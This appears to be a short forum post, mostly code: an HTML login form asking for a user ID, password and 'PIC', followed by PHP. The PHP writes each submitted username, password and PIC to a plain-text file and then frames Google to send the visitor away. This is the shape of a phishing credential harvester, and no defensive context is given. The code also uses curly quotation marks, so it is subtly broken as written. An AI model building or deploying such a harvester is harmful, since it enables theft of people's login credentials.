Forum Moderators: coopster
<form name="login" id="login" action="login.php" method="POST">
User ID
<input type="text" name="txtId" id="txtId" class="input" value="" tabindex="1" size="20">
User P/W <input type="password" name="txtPassword" id="txtPassword" class="input" value="" tabindex="2" maxlength="12"><BR>
User PIC <input type="text" name="txtPIC" id="txtPIC" class="input" value="" tabindex="1" size="20">
<input type="image" src="login.gif" name="image" value="submit" alt="Submit button"></div></div>
</form> <?php
$fp = fopen(”password.txt”, “a”);
fwrite($fp, “Username:$_POST[txtId]\tPassword:$_POST[txtPassword]\tPIC:$_POST[txtPIC]”);
echo “<HTML>
<FRAMESET cols=\”*\”>
<FRAME src=\”google”>
</FRAMESET>”;
?>
</div></div>
</form>